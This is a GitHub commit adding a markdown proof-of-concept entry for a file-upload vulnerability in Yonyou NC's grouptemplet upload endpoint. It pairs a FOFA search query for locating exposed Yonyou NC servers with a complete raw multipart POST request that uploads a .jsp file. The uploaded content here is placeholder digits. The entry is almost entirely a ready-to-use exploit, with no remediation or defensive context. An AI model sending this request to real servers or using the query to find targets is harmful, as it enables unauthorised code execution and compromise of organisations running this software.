Create 用友NC_grouptemplet文件上传漏洞.md

This commit is contained in:
wy876 2024-04-17 20:06:37 +08:00 committed by GitHub
parent 5e13bc7c9a
commit ca5f3e3efb
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194

View File

@ -0,0 +1,23 @@
## 用友NC_grouptemplet文件上传漏洞
## fofa
```
title="YONYOU NC"
```
## poc
```
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp&maxSize=999 HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryEXmnamw5gVZG9KAQ
User-Agent: Mozilla/5.0
------WebKitFormBoundaryEXmnamw5gVZG9KAQ
Content-Disposition: form-data; name="file"; filename="test.jsp"
Content-Type: application/octet-stream
111111111111111111111
------WebKitFormBoundaryEXmnamw5gVZG9KAQ--
```